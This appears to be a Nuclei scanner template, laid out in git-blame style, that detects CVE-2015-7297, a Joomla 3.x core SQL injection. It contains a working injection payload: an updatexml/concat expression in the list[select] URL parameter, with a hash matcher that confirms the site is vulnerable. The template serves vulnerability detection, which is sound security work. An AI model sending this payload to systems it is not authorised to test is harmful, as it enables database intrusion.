2021-04-07 16:52:11 +00:00
|
|
|
id: CVE-2015-7297
|
2022-03-02 14:57:55 +00:00
|
|
|
|
2021-04-07 16:52:11 +00:00
|
|
|
info:
|
|
|
|
name: Joomla Core SQL Injection
|
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
2022-03-02 14:57:55 +00:00
|
|
|
description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
|
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
|
|
|
|
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
|
2021-04-07 16:52:11 +00:00
|
|
|
tags: cve,cve2015,joomla,sqli
|
2022-03-02 14:57:55 +00:00
|
|
|
classification:
|
|
|
|
cve-id: CVE-2015-7297
|
2021-04-07 16:52:11 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "cf79ae6addba60ad018347359bd144d2"
|
|
|
|
part: body
|
2022-03-02 14:57:55 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/03/02
|